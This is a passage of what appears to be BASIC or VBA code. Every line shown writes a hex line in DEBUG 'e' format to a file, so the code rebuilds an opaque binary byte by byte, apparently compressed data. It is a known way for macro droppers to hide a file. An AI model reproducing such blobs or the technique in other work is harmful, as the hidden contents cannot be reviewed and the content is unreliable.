6A B6 1D A1 32 A0 1B 5B 66 03 9E A5 0E 3B C3 52" Print #1, "e 4210 36 04 1F FD 88 76 BD E9 FB 98 B4 F6 8D A3 E9 74" Print #1, "e 4220 82 AD AA 3B 2B 2A C4 74 2E BF 50 E2 60 38 0F 01" Print #1, "e 4230 8E 60 5C C2 EC 6E E2 B6 37 58 42 24 DC 32 41 39" Print #1, "e 4240 B8 54 3A 56 B1 2D 74 A5 8A 85 EB 35 EB AC B4 17" Print #1, "e 4250 78 84 AC B4 9B 1D 40 BC 39 F3 36 1F 10 2A 83 98" Print #1, "e 4260 14 6E FC 40 D5 A0 95 38 54 59 5D 4A 50 2C CC DD" Print #1, "e 4270 DC 67 3D 40 CE A2 74 A8 BB D4 B3 2A 5C 68 D2 93" Print #1, "e 4280 7C 9A 8D 1F 04 B3 02 4A 6E C0 35 4C B1 47 31 B6" Print #1, "e 4290 58 2F 78 C7 33 86 2E 20 B3 17 28 E7 50 72 97 98" Print #1, "e 42A0 8D BA D4 A6 2F 18 88 5E 12 81 E8 B8 A5 05 6D 46" Print #1, "e 42B0 97 7A E2 55 CA D7 58 B3 65 C2 57 1B 2A 60 22 D4" Print #1, "e 42C0 50 DA 0A 1E EA 29 F5 B1 6E 58 5F B2 DA 8D 3C D6" Print #1, "e 42D0 A0 0D 99 84 1C C3 47 2F 69 A3 AE E2 6A DF A9 48" Print #1, "e 42E0 E6 54 63 9A A9 44 B8 59 75 0F 30 AA 90 F3 31 40" Print #1, "e 42F0 1E 60 0B 47 A6 65 FB 36 B9 61 E3 C4 3C 24 00 74" Print #1, "e 4300 FA BF 71 9B 6B 2D 0C 74 AE 0B 8A 58 C0 1D 53 B5" Print #1, "e 4310 BF 97 12 F0 00 2C 8F 8D 1E E5 6D 33 2F 97 A5 E0" Print #1, "e 4320 BA 80 E5 FD 1A B5 67 16 30 DD 8D 8E 23 21 96 8D" Print #1, "e 4330 37 6A 09 82 D4 3B 7D 43 82 C6 53 42 30 D0 77 BF" Print #1, "e 4340 45 AE 42 3B 74 6B AF 50 34 79 88 16 98 1B BC 9B" Print #1, "e 4350 0A E4 63 0B 66 0D 07 C5 E9 F7 13 3D 5E 03 EB 99" Print #1, "e 4360 91 CE 82 D0 A8 B9 C9 1A 73 7A 83 48 2D C4 B8 A5" Print #1, "e 4370 D9 D2 1A CF 66 62 27 57 69 86 31 F3 1C 05 4F 5C" Print #1, "e 4380 CC 21 4F BA 99 BA 3C CB 38 F9 B3 8A 58 76 42 7C" Print #1, "e 4390 C4 36 01 0B 5B B4 C7 40 26 EA 69 02 A6 2B D0 3F" Print #1, "e 43A0 1B 6F 05 D6 DB CC 51 97 51 C2 64 E2 E0 57 9B 2F" Print #1, "e 43B0 DD E1 34 0F 89 C9 8C CB 72 DC 27 B8 AD 03 DC 49" Print #1, "e 43C0 46 FB 86 BF D4 CF 6B E9 83 C3 F9 94 32 C6 28 D8" Print #1, "e 43D0 22 83 61 EB 53 24 E4 AD EC 12 BB A4 AB 28 29 39" Print #1, "e 43E0 4B EC E6 63 3F 17 03 F2 82 94 4E 10 41 7E 46 BD" Print #1, "e 43F0 4B 82 F7 03 8F 17 58 BF 44 7D 92 A0 6F 2F 42 23" Print #1, "e 4400 26 46 A0 49 8D A9 3D 46 41 AC 2A 19 D0 A5 42 F2" Print #1, "e 4410 D0 50 00 A7 93 30 52 AB 53 E2 74 C7 A9 66 F4 96" Print #1, "e 4420 50 1E 75 02 74 A1 78 5E 73 10 CD 88 8A 33 B8 EE" Print #1, "e 4430 66 0F 65 4D CF 99 77 29 40 CB DB 44 72 E2 D3 76" Print #1, "e 4440 D6 3A C0 40 AC 8B C2 F4 20 4F A0 92 D7 EE 11 51" Print #1, "e 4450 A7 42 AE 1F F7 E2 33 F9 8F 4E 01 F6 7E 25 1C 61" Print #1, "e 4460 03 E0 B0 79 85 EB A1 63 70 70 25 E1 CB B9 43 D7" Print #1, "e 4470 E1 5E 0D AF 0A 01 7C 62 30 0E A8 BD 2B 57 77 46" Print #1, "e 4480 6D AF A9 C8 1A 0E 77 5A 6D 58 2E EA 54 57 AE 12" Print #1, "e 4490 29 B8 2F 0A 45 79 32 80 2D 5E 7C D3 E5 F8 96 05" Print #1, "e 44A0 00 CD 6C 75 95 59 E1 82 3E 44 36 5D CC CB 5F 10" Print #1, "e 44B0 BA 7D 8C 6D 68 00 E0 75 2F F5 1D CD 27 50 8B 40" Print #1, "e 44C0 A4 00 43 AC DB F8 BF F1 E6 11 5A 0A F4 09 BD BE" Print #1, "e 44D0 F1 25 A2 47 DF 41 52 BF 17 17 F0 74 73 FE 37 2F" Print #1, "e 44E0 F1 CC BF C1 B9 71 58 CA B9 A8 3B DA 09 66 69 FF" Print #1, "e 44F0 00 57 1D 5E 77 0B FA 4B 08 5A 52 B0 56 70 E6 EF" Print #1, "e 4500 BC B7 57 63 64 36 01 B2 DA CA E5 AB D5 BD 20 11" Print #1, "e 4510 6B 29 FA 4C A1 16 DC 6F F4 41 E5 0C 70 2A A9 70" Print #1, "e 4520 EA 53 42 15 6D 11 9D AA B4 00 AA 76 62 05 70 28" Print #1, "e 4530 2A 99 86 5D 85 08 53 C1 5F E4 05 A8 8C E4 F0 F9" Print #1, "e 4540 1E 25 C0 B0 5B 63 D9 E9 D9 F1 14 E6 22 B2 35 C5" Print #1, "e 4550 8B 93 1C D3 AC 4B FE CF 1C 7A 95 8E 98 B2 FC E6" Print #1, "e 4560 17 D1 94 E4 F5 3E E6 6E 0D 04 2B 06 30 78 82 09" Print #1, "e 4570 68 B5 78 52 59 A3 57 D0 96 60 EE 1A 03 8A E5 60" Print #1, "e 4580 00 6E E0 33 1B 45 51 40 B5 5F 11 05 87 14 03 7F" Print #1, "e 4590 F7 58 50 7C 94 60 29 55 D0 F7 25 8A A7 63 74 65" Print #1, "e 45A0 FE C2 AA EC 31 5D FC 05 C1 69 6B 9B 4A 73 84 B2" Print #1, "e 45B0 2D 48 85 0D D9 C5 07 7E E1 E4 19 19 20 E6 90 29" Print #1, "e 45C0 08 54 95 AD B3 CC 40 0B 36 BB DC 75 9D E1 B3 E2" Print #1, "e 45D0 39 D7 5A 3F 51 71 A0 96 01 37 14 F5 B4 E2 7C 8A" Print #1, "e 45E0 64 E5 B8 9D 86 0F A4 F5 3F F9 D3 74 3D 4C F1 A9" Print #1, "e 45F0 78 02 7A 04 05 11 02 8B DD B8 4D F6 6F 0F 89 76" Print #1, "e 4600 83 D3 6D 44 21 C0 76 F5 4C BA 9A 46 D7 59 AA 89" Print #1, "e 4610 B6 CE 6D CA F5 1A 6E B5 B1 22 14 15 DC A8 A7 30" Print #1, "e 4620 5C C0 14 72 13 2E 66 D5 03 69 C4 E1 93 B6 F8 8D" Print #1, "e 4630 6D 23 1B 31 69 DF C1 0B 3E 08 EF 7C 12 BD B8 3A" Print #1, "e 4640 0A 2D AC 92 F4 A4 B6 8E 5D 32 47 D4 0A 5D E0 EA" Print #1, "e 4650 6A BE 25 04 2E E0 AF D5 41 A5 4D F0 F4 97 2B 56" Print #1, "e 4660 F0 5E CE 7E 65 AA 86 2E 22 3C 95 BE 73 1F F8 4B" Print #1, "e 4670 43 A2 8E 65 E3 2C 2F 59 DB B6 21 DD 75 A3 A7 46" Print #1, "e 4680 3D 70 B1 56 1A 0B 32 E7 D5 CA BC 81 82 5A B9 C6" Print #1, "e 4690 72 F3 E2 52 89 5A AE 35 75 84 D9 6C 55 16 EF AB" Print #1, "e 46A0 1A 6B 52 B2 9D CB C8 F7 FB 94 1A 45 69 14 D7 A8" Print #1, "e 46B0 DB 21 01 B6 F8 8A 06 80 34 29 22 32 F5 98 B7 9B" Print #1, "e 46C0 C4 3C A9 61 1C B1 E6 CF 77 12 A1 5B D4 EA DA C1" Print #1, "e 46D0 A3 AC C9 AA A5 AA 82 F2 06 77 01 49 3C 0D 20 0C" Print #1, "e 46E0 AF AA 4C 18 7C 14 CB 68 48 CD ED 8E 18 A8 A5 E7" Print #1, "e 46F0 19 96 A1 21 B6 4E AA C7 8C 7E E3 0C 16 F3 A5 46" Print #1, "e 4700 52 84 53 40 60 1E 18 3E 89 4A 8B DD 60 59 57 1A" Print #1, "e 4710 C1 43 3D 9B 89 A6 D3 8B 95 15 52 D2 55 D7 75 71" Print #1, "e 4720 B9 B4 11 C1 E8 4C 26 F0 AD B1 85 75 DE 65 5A 9B" Print #1, "e 4730 DC 70 65 82 DF A8 9F A2 28 11 A3 F1 01 F4 4C 92" Print #1, "e 4740 DD 08 EF 02 D1 B7 B4 AA 28 2E 9E 25 25 1A 75 BC" Print #1, "e 4750 9D A2 83 86 31 42 58 AF FC 3F EE D2 E5 6E D5 65" Print #1, "e 4760 FF 00 AE 18 25 B8 A5 03 BF F2 08 9D 6E EA 97 BE" Print #1, "e 4770 22 45 0F 55 37 AD 62 93 EF 50 E8 69 B1 6E A6 1D" Print #1, "e 4780 AA 63 00 54 41 35 02 A6 44 AA C3 F8 28 EE 05 67" Print #1, "e 4790 11 56 57 C5 42 BA 65 46 D2 6F D2 E3 35 83 52 D6" Print #1, "e 47A0 BF 73 10 FB 14 D0 12 8A A6 C0 7D 4A 4D 06 4D D1" Print #1, "e 47B0 7E 74 47 10 41 65 13 8C 72 F7 C4 70 54 4C 0A EB" Print #1, "e 47C0 4F 3E 65 EF 90 2D AE 1D 1C 6A 74 A6 DA 57 B4 7D" Print #1, "e 47D0 40 B8 B7 4F 5A AA 99 81 26 21 42 99 E7 77 10 B9" Print #1, "e 47E0 5B 90 D7 80 97 C0 DA 9B 29 18 DB A6 4B 2D C1 EA" Print #1, "e 47F0 57 49 40 39 B4 6A FD F9 8A 2A 11 78 96 5D D6 11" Print #1, "e 4800 A0 48 35 83 87 1E 65 24 3D 5D 8B A4 7A AD 6E BD" Print #1, "e 4810 3A C6 CA 6D EF F5 D7 83 B4 70 30 50 83 67 F6 59" Print #1, "e 4820 DE E8 15 46 DA 17 53 96 5C 66 AE D4 A8 B0 B9 F0" Print #1, "e 4830 1F A8 11 58 B9 26 45 0B EE 61 F7 37 70 D7 D4 70" Print #1, "e 4840 BF 4A 0C 62 36 C9 74 19 09 37 68 2B FD B9 49 33" Print #1, "e 4850 41 50 96 DB 45 1B 4B 7F AA 81 76 1B F5 18 2D 4C" Print #1, "e 4860 68 41 2E 2A CE 9C C5 B8 7B 02 22 49 90 83 D3 81" Print #1, "e 4870 B8 87 2B C4 00 74 99 51 0C 47 79 6F 1A 51 71 AA" Print #1, "e 4880 D1 59 CF 32 DE 94 D1 05 AD 9A 61 82 86 82 17 EF" Print #1, "e 4890 DC CB 60 43 E2 5B 24 43 BC D4 B0 DA F3 16 89 70" Print #1, "e 48A0 6A 51 E8 37 D7 3F 10 DC AA AB 39 53 FE A8 62 99" Print #1, "e 48B0 B3 67 15 1D 57 05 45 D1 16 E2 53 51 83 53 85 8D" Print #1, "e 48C0 EA 98 9D 6A 21 A1 19 20 8A 53 F1 36 DC 78 17 10" Print #1, "e 48D0 6A E0 59 23 C0 D7 98 13 3B 43 6E 6A 51 6A 8D 2A" Print #1, "e 48E0 77 E8 14 22 E1 85 64 D3 F1 1C 66 F4 BA BE 65 43" Print #1, "e 48F0 1C C0 71 13 C5 32 0C 87 38 A8 98 98 91 06 AE EC" Print #1, "e 4900 EF 99 8E 9B 00 E3 E9 82 89 5E 80 68 36 71 CF D4" Print #1, "e 4910 AC 70 D5 0A FC 61 AD 99 A5 0A 07 D4 DE E0 30 2C" Print #1, "e 4920 60 20 E6 AA 1C 35 D2 35 98 44 41 EB 07 7B 79 87" Print #1, "e 4930 93 15 2E EA A1 D3 97 98 DB 32 BE 92 42 85 4F 18" Print #1, "e 4940 48 6B 1C 68 80 F4 AC A7 93 D8 3F 72 80 C8 5B 45" Print #1, "e 4950 AF 51 50 CF 28 34 7D 97 32 08 71 99 79 E9 EE 58" Print #1, "e 4960 8D 62 CB 24 25 19 C3 98 74 B8 B9 7A C8 AB 21 08" Print #1, "e 4970 2A F7 04 D7 C4 D0 CA C7 0A B7 03 98 25 DF 63 7B" Print #1, "e 4980 AA 96 46 95 77 FA 62 1D 4F B7 A3 D3 30 DD A1 0C" Print #1, "e 4990 7D E2 81 5A F8 FF 00 25 2C FB AD FE 41 D5 02 8A" Print #1, "e 49A0 2E B8 3B C0 30 37 27 30 28 6D 1D BA CC 5B 8A 4D" Print #1, "e 49B0 BB 88 4B BA 62 D8 83 AD 3A 81 29 39 EA FC 46 6E" Print #1, "e 49C0 3E F5 A4 6E 8F 45 8C 51 3C 31 FB 88 02 5D B5 F1" Print #1, "e 49D0 FC 94 64 17 CE A0 A3 7F A4 34 16 7B 46 91 34 E1" Print #1, "e 49E0 30 2E F0 61 9C AD 9C 84 BE 27 09 5E 12 B8 4C 0D" Print #1, "e 49F0 DC 2B CB 06 F2 B0 4E B1 0C 0D 70 88 C0 10 D9 78" Print #1, "e 4A00 61 48 F2 B5 58 82 17 11 C5 E7 EA 0A 4F B5 77 FA" Print #1, "e 4A10 94 21 43 8C 37 D5 DC 4B 78 41 DF 99 52 E1 0A D9" Print #1, "e 4A20 71 6A F2 6C FF 00 C4 C7 E5 8E 40 7F 4F E4 A4 75" Print #1, "e 4A30 90 FE A2 F0 D4 72 2A 7D 44 C1 6C 15 5F 15 0D A1" Print #1, "e 4A40 32 F0 53 17 43 77 55 31 77 C2 C7 BA 7F DC 2A 17" Print #1, "e 4A50 B5 5D 58 76 0D F5 19 47 70 51 7A 0B AF 22 E3 D6" Print #1, "e 4A60 E3 76 E1 19 17 54 C0 63 65 05 4C 2E A5 3A E6 61" Print #1, "e 4A70 2F 54 CD 71 2A 73 28 FB B3 E6 58 A9 BB D5 C3 4E" Print #1, "e 4A80 C0 0B 4A C5 2A 64 BD 34 50 3D 45 6F DB 16 1F 51" Print #1, "e 4A90 C9 A0 BA BA 98 CC EE C0 67 C8 9F C8 74 DE DD 6E" Print #1, "e 4AA0 C0 E4 F9 8B DF 35 A9 0A A2 6E A3 A7 65 84 23 6D" Print #1, "e 4AB0 45 E9 E5 C7 38 3C CA 14 49 83 DC 54 BA EC B7 DA" Print #1, "e 4AC0 17 42 51 80 78 43 E1 72 CD 56 A8 0E E2 58 77 D4" Print #1, "e 4AD0 12 F4 2A 40 CD 68 B2 CD 97 2F 71 6A 65 01 4A D8" Print #1, "e 4AE0 AB AA 97 D4 A2 22 0D 2D 17 64 CD 1E 65 40 FC 8A" Print #1, "e 4AF0 E7 4C 2F CB 52 E8 19 AB DF E1 BF B4 42 20 72 14" Print #1, "e 4B00 34 8D E1 96 E8 52 D7 2C B1 56 B7 AD C1 D7 E2 F2" Print #1, "e 4B10 D4 56 1D 90 7F 50 C8 3E 69 A8 B4 D7 6C 98 8C 93" Print #1, "e 4B20 D0 5C 6C 9B C8 D9 31 16 29 40 62 41 47 33 E8 21" Print #1, "e 4B30 2B B5 CD 2F ED D1 E2 5A 5A BE 28 CB 2C 1D EE 3F" Print #1, "e 4B40 EB 96 A9 41 16 05 E5 61 AA AC 3D F9 4B D1 19 1C" Print #1, "e 4B50 EC E7 75 DA E0 BD 65 E0 3D 23 98 0A 62 58 5E 25" Print #1, "e 4B60 EF 33 E8 45 CC A7 3C 45 DE 22 58 5E F2 F6 D0 14" Print #1, "e 4B70 69 AB CD 45 60 B8 1A 6B A9 E2 08 26 13 CA 17 1D" Print #1, "e 4B80 B9 05 F9 23 0F 62 E1 75 A7 D0 C3 16 3B 76 77 0E" Print #1, "e 4B90 14 52 D1 6B D8 97 E3 4A B3 79 F1 19 76 2D B2 1B" Print #1, "e 4BA0 00 D3 47 F9 1E 5B 97 00 F5 70 BE F2 AB F6 06 E1" Print #1, "e 4BB0 E8 FD B3 DA F4 AF D0 DF DC 06 13 01 6C 69 99 65" Print #1, "e 4BC0 0B 53 36 F5 20 81 2C 0A DD 63 1D 21 C7 60 17 20" Print #1, "e 4BD0 33 D5 93 88 91 C9 07 B7 80 15 7D DE F0 C8 AB 54" Print #1, "e 4BE0 86 DC 40 DB 2E B9 30 18 81 08 15 6E D2 E2 6C 17" Print #1, "e 4BF0 D2 5E BB 4C 3B A2 6C 53 94 5D 13 10 36 A2 CE 15" Print #1, "e 4C00 D3 98 9D D8 C1 42 5F 1C BF 71 38 DE 33 B2 18 91" Print #1, "e 4C10 5E 4D C1 88 A5 90 B4 63 17 E2 E1 F4 33 34 F2 41" Print #1, "e 4C20 35 FB 97 2E A1 04 E4 E4 78 40 45 20 24 0A 0E 9A" Print #1, "e 4C30 EF 30 5F 46 96 F5 2D F8 5D 4B CE D2 96 07 86 87" Print #1, "e 4C40 F5 11 A3 C8 54 F0 31 BF FC 40 82 5C 7B 9C A9 14" Print #1, "e 4C50 D6 80 4E 56 56 12 0F 94 EA B6 00 C2 F3 A6 2C 51" Print #1, "e 4C60 89 D3 DD 0A DB 96 89 45 34 DE 36 85 54 05 6B 5A" Print #1, "e 4C70 44 E4 08 89 F9 31 3D 7A 98 B1 79 6C 5C 06 6C E0" Print #1, "e 4C80 0C EC CC 61 90 3E C3 7B D0 CB D3 96 CC 34 52 F0" Print #1, "e 4C90 9B 2E EF 11 D5 A9 73 72 8D E8 D9 4A 0C 60 97 9B" Print #1, "e 4CA0 12 AD C3 89 45 AD 62 9A 9E 70 FA 65 A0 73 43 84" Print #1, "e 4CB0 02 93 91 5B C6 B5 05 25 CB 4A 3E 58 B2 94 B6 85" Print #1, "e 4CC0 F8 EB 29 11 57 C4 BE E9 7C 95 D8 96 DF 90 25 AC" Print #1, "e 4CD0 79 50 6F 61 AB F5 32 A3 EA 88 C8 05 29 2F 99 CF" Print #1, "e 4CE0 14 DE BB D5 10 AF 00 0C 64 E1 AD 21 9A 8A D0 CB" Print #1, "e 4CF0 89 A8 74 4C 39 A8 CA 33 36 C2 91 E6 ED 8B AB 94" Print #1, "e 4D00 0D CB 18 0D DA C4 09 98 4A 34 43 0E BB 34 97 9F" Print #1, "e 4D10 34 24 AD 3A 34 0D 1C 47 7D 6D A0 42 A2 D9 3D 71" Print #1, "e 4D20 1D 21 ED 2D 95 64 54 21 03 CB BC BD 91 AB AC 5B" Print #1, "e 4D30 8B 08 B0 7B 4C 97 65 6E D9 C0 33 FC 95 77 28 41" Print #1, "e 4D40 17 98 BE B0 E7 0C 4B 8D DE 63 E4 DB 66 77 10 48" Print #1, "e 4D50 2E AA BF 73 0C 95 1A E7 AA BB 82 92 AD 65 3C 1D" Print #1, "e 4D60 BC 78 8A 98 62 52 96 E1 5F C8 17 D8 EC 07 59 60" Print #1, "e 4D70 18 28 16 6D 92 73 5D 73 2A 49 74 DA 20 64 FF 00" Print #1, "e 4D80 49 46 79 40 CB 99 49 E8 36 BF 3D 21 C2 20 5B 66" Print #1, "e 4D90 35 8A EE F1 28 5A 28 2F E4 78 8A 3F 39 40 E6 B1" Print #1, "e 4DA0 5D F8 8C 97 8D 0E 05 F2 AC 2F 6E 83 1E 25 F9 D2" Print #1, "e 4DB0 2B B1 0E AF DC B0 F3 2B 6E C4 8D 25 D9 43 3E 53" Print #1, "e 4DC0 B4 7A 11 DC 69 B5 E4 7F E5 CA CF B8 7B 72 39 0F" Print #1, "e 4DD0 66 8B 96 F1 0B 6E F1 83 0B 5B EB E5 B9 76 44 A4" Print #1, "e 4DE0 E4 AE 2D 67 CA 18 14 15 2C A6 14 5B AC 25 54 E5" Print #1, "e 4DF0 B6 35 6A B8 21 2F 20 56 61 02 42 C0 09 F6 23 1B" Print #1, "e 4E00 85 8A F4 A5 D5 06 21 46 32 18 3D 29 13 8F 71 71" Print #1, "e 4E10 01 54 6A A9 4A 2D 3B C7 72 1A 81 8C C1 76 F6 C1" Print #1, "e 4E20 07 04 27 A4 B4 A6 69 0C 97 CC 36 38 C6 6C B7 C5" Print #1, "e 4E30 C6 2D 47 A1 6D FD C0 26 55 D5 47 18 E3 DC 4E 8E" Print #1, "e 4E40 11 61 50 E0 72 80 B2 6B 49 37 7F C6 FB 42 E1 09" Print #1, "e 4E50 D0 7D 5C 20 53 69 72 C8 80 AB 36 F7 10 08 D0 2E" Print #1, "e 4E60 B8 25 18 66 20 C4 B1 9D 2C B3 57 6C C1 84 80 AF" Print #1, "e 4E70 35 D8 FC CB 96 96 75 BF 49 D8 8B 0C CD 73 05 5B" Print #1, "e 4E80 81 6E 61 4D C4 8E E6 1C C0 A8 22 D4 6E B2 E1 77" Print #1, "e 4E90 A8 D4 5E 63 CE DB 00 BC 6C 6B B3 53 8B 1F B2 7E" Print #1, "e 4EA0 CD 77 84 2E 07 65 EA 09 5D B3 3B D4 A5 A6 32 BA" Print #1, "e 4EB0 42 97 DF 11 05 20 C3 CA 58 6C DD 08 09 7B CB 1A" Print #1, "e 4EC0 AB 40 76 32 DF 78 52 F6 11 32 F3 4E BF F2 61 4E" Print #1, "e 4ED0 EA 25 0E 23 83 9F 72 F2 F1 5C 4B 54 6C B3 BB D2" Print #1, "e 4EE0 21 18 76 65 88 2C 46 D5 77 31 F3 2A 65 77 23 08" Print #1, "e 4EF0 5D 67 0F A9 89 82 A0 D8 40 CD 15 FA 88 8F BB 4A" Print #1, "e 4F00 58 4B 0D 2F 17 85 E9 11 16 56 EE BF EE B1 79 2F" Print #1, "e 4F10 17 57 66 5D 50 BD B7 17 0C 59 4F 31 03 52 E4 07" Print #1, "e 4F20 D4 05 03 BD FF 00 12 92 61 66 2A FE A0 DC 45 00" Print #1, "e 4F30 29 CD 11 A8 45 6A 3C F5 80 9B 61 EB 61 B4 9A 9C" Print #1, "e 4F40 94 3A E4 60 8C B3 D3 10 5B 7E 17 0A 1D 25 4C AD" Print #1, "e 4F50 74 71 86 58 B9 E9 03 BF 46 A9 39 FA 6D 85 01 88" Print #1, "e 4F60 B2 87 E1 66 C7 BA 94 42 F9 73 29 D0 A6 0C F5 86" Print #1, "e 4F70 A8 69 7C C5 38 64 BF 21 EA CE 16 A5 55 FF 00 19" Print #1, "e 4F80 75 C2 58 1E E3 AD 41 3E E3 62 25 1A 67 3B 2C BE" Print #1, "e 4F90 7A 24 7E A0 22 EF 49 1D 1E 47 B8 B2 40 14 61 9B" Print #1, "e 4FA0 A0 5B E6 31 52 98 A8 AA CE 73 0C E5 04 07 C0 2D" Print #1, "e 4FB0 77 D6 18 94 A1 22 06 F0 38 88 AC 83 1B 0F 98 A2" Print #1, "e 4FC0 EA A2 D7 6C 5F 7D 47 E2 91 CB 7F B2 0E 91 47 0E" Print #1, "e 4FD0 C7 C9 38 7C 86 77 BA EA 61 BA A9 2B 88 7D 02 A3" Print #1, "e 4FE0 96 A8 B5 02 F3 13 94 E9 A8 D4 FB 55 AA 77 40 98" Print #1, "e 4FF0 6A C1 B0 35 A3 E5 8C 1D A0 C5 87 CE E5 A8 05 50" Print #1, "e 5000 78 B9 F8 A9 75 7F CD 28 F5 23 65 8D 86 FE 2C FD" Print #1, "e 5010 CA 42 BA 8B F5 51 17 19 9A 27 A5 D9 F2 92 C7 D7" Print #1, "e 5020 41 F0 0B 1F 4C E5 24 06 49 EA 12 22 BE EF 10 1B" Print #1, "e 5030 1F 0C 3C 5B 9B F8 F3 08 94 51 03 DC 84 1A 88 EA" Print #1, "e 5040 0E 27 6B 43 3B 9C CA BB D2 B2 97 92 16 05 F6 B6" Print #1, "e 5050 50 AF D7 55 22 B7 0D 8D 6F CB 70 1D 32 A8 24 3D" Print #1, "e 5060 5D 46 E2 8A 54 ED D0 6E 2E B0 C0 B4 77 D2 5A 19" Print #1, "e 5070 5D D1 B9 8A D5 78 99 40 A0 75 2C DC 60 88 65 33" Print #1, "e 5080 51 8B 40 89 E6 3E DE B4 43 7B E3 72 EA 63 BC 6B" Print #1, "e 5090 C9 0A 80 63 54 11 76 E8 E7 09 CA BB 2E 98 1D 59" Print #1, "e 50A0 2B 54 AA DC CD 83 7A F2 C3 4A 50 22 03 49 2B 73" Print #1, "e 50B0 7A A5 69 3D CD 50 BB C6 E3 3B 1D 85 A7 AC 25 27" Print #1, "e 50C0 49 6E 3D 22 36 0C 21 9C 4B 26 93 B0 8E 6B 85 0F" Print #1, "e 50D0 2D D3 4D DB 5D 6A 20 67 00 2D 5A 85 E0 BE 1D 52" Print #1, "e 50E0 58 E6 45 74 16 D3 6D 89 01 CD 69 1A 04 0F 8B 32" Print #1, "e 50F0 E7 50 54 84 BD 52 2A 85 16 BE 22 BA 18 69 85 0A" Print #1, "e 5100 A3 E2 3A 21 35 07 D2 05 42 BC AC DB B4 EE 80 07" Print #1, "e 5110 DB 79 83 6C 55 98 1D 1A 87 22 EC DC 5F 71 AA FC" Print #1, "e 5120 A4 41 72 94 3C AC DA 28 E8 07 35 15 B6 B0 DF 3D" Print #1, "e 5130 4F 8B 8D 16 0C F4 48 90 31 D3 33 1D 69 C5 A7 DE" Print #1, "e 5140 E3 A9 43 21 0F ED 63 BE 78 55 95 E2 51 BD 76 AC" Print #1, "e 5150 FD 31 DB 81 92 A6 F9 C9 B9 CB 2B 84 BC 54 2A CE" Print #1, "e 5160 3B 42 34 57 7B 57 54 77 86 D8 0B 9A C0 BF DC 66" Print #1, "e 5170 05 33 17 83 85 88 BB 99 54 4C 60 3C 4A 73 A7 24" Print #1, "e 5180 40 21 F0 4F D2 00 01 E8 02 8E FD FD 4B 54 01 80" Print #1, "e 5190 FA 09 64 F4 E6 C7 9F 78 A5 81 54 BB 11 5A DD 00" Print #1, "e 51A0 6F A9 D1 81 8D 37 4C 3D 53 AB 3F 55 1D F4 98 FC" Print #1, "e 51B0 54 0A CE 62 AE DB 8C E2 1B 66 55 92 C6 4C A8 2C" Print #1, "e 51C0 3B C0 DC 0A 1B B9 61 89 56 8C C2 ED 17 C1 41 A6" Print #1, "e 51D0 A6 18 7F 08 7B AC A5 41 6F 16 B1 CD FF 00 A8 8F" Print #1, "e 51E0 42 34 C8 F3 10 2B B2 58 64 5B B8 24 A5 D2 16 09" Print #1, "e 51F0 F6 44 20 95 79 2E 02 C2 81 70 F7 EF 0E 03 90 DA" Print #1, "e 5200 DB C4 6D 48 A4 CA D6 38 6D 87 61 87 B6 02 BA 0D" Print #1, "e 5210 C3 45 78 AE D2 82 06 80 E2 F4 16 C9 65 E0 C5 31" Print #1, "e 5220 C5 8D 5D 58 B6 AB 93 58 67 AC 40 2A 68 41 EA 00" Print #1, "e 5230 7E A0 25 CA F1 1C EB 98 34 D3 F7 3D 9F 27 F6 71" Print #1, "e 5240 8D EC 1F 75 31 88 27 95 72 62 5C BD D3 F1 D2 AF" Print #1, "e 5250 EA 32 22 43 20 8A 5D F0 66 9A CF 52 1F 64 5D 48" Print #1, "e 5260 19 BB 45 AE 66 BD 1C D8 BC AD 39 AA 1E A2 DC 29" Print #1, "e 5270 97 2D 4B 80 B2 BA AE 8F 49 8B 24 E3 30 59 BB 7A" Print #1, "e 5280 8C 18 6A 73 44 4B D6 E7 78 BA 97 D4 74 8F 38 DF" Print #1, "e 5290 64 BF 21 65 8C DF 23 5F 47 FB 82 48 6C 5A FA E4" Print #1, "e 52A0 0B F8 25 A9 A1 79 8C 25 B3 05 D4 82 69 D4 7F 0A" Print #1, "e 52B0 30 87 A5 C9 6A AE BA F7 8A 8A B3 D1 D7 CC C8 CF" Print #1, "e 52C0 25 6F FD 4B 96 0E C2 36 DC B8 ED 18 0B 7F 23 4A" Print #1, "e 52D0 6E FE 59 2D A3 A0 68 D7 78 FB 40 3F 69 D5 5D F1" Print #1, "e 52E0 8F 32 CA 0E 89 3B 50 0F 7B 63 1A B6 17 8F 43 03" Print #1, "e 52F0 7E 19 C2 9D C2 2F 48 B4 5F 45 19 81 CA CD E1 02" Print #1, "e 5300 26 0C AF 07 57 BC 14 81 2D 48 11 D0 68 6E C9 F8" Print #1, "e 5310 5C FA 7C CD F0 91 B1 EB 5C 12 9B F9 EF 5D 0F 25" Print #1, "e 5320 92 C5 21 71 47 40 4A BD 46 FF 00 C0 69 75 7C C4" Print #1, "e 5330 2F 01 89 92 34 51 2E 3B 9D 8E 97 E2 5A 35 A2 E4" Print #1, "e 5340 FC 4B A0 E6 A8 D9 10 7B 3D 5E 25 FF 00 4C ED 98" Print #1, "e 5350 BC 69 26 03 F5 2F 4D EF 11 30 9B 58 40 BD 08 16" Print #1, "e 5360 C6 30 67 05 0F 63 F4 41 3B 81 76 5C 67 69 83 BA" Print #1, "e 5370 83 0A 6D F3 2C BE F8 D8 1C 65 20 50 CB 15 AE 0F" Print #1, "e 5380 A2 85 E2 79 2C 52 16 70 55 62 D4 19 9C 9C D6 89" Print #1, "e 5390 78 17 75 0A 6E B0 36 6A 2A 95 23 81 A2 20 C8 B7" Print #1, "e 53A0 A9 4B 48 AE B0 D5 A7 F2 20 77 20 27 EA 2B 5F 27" Print #1, "e 53B0 FD 40 23 A9 D6 4A 3A C8 08 37 5C 0B D0 82 B0 75" Print #1, "e 53C0 1D B0 D6 1A F7 0B 50 09 05 D9 5D AC A3 58 82 DC" Print #1, "e 53D0 F0 10 59 B0 B8 56 7C 40 0C E2 2B 0B CD 67 0F 88" Print #1, "e 53E0 B9 96 82 5C B6 74 30 09 42 36 73 0C 32 9D B8 98" Print #1, "e 53F0 65 36 EC 13 FB 0B BE 61 C7 48 95 BE E6 E1 B2 80" Print #1, "e 5400 BB B5 18 53 8B 0D 6A 22 C2 2E DB 7A 44 F1 98 4D" Print #1, "e 5410 6A 99 BD 33 EC 62 B6 ED 57 AC 33 48 AC 4B 0C 66" Print #1, "e 5420 A2 8D A7 1D 48 EF 1F 85 1C 33 2C 2A ED FF 00 02" Print #1, "e 5430 54 5C 94 18 3B B1 C8 80 18 05 B2 E5 37 E2 59 58" Print #1, "e 5440 5E 5A BA D4 BB 2F 06 EA 06 40 8A C7 46 E5 1F 29" Print #1, "e 5450 75 7F 03 AD F7 ED BC 40 18 5A D8 9A 4F 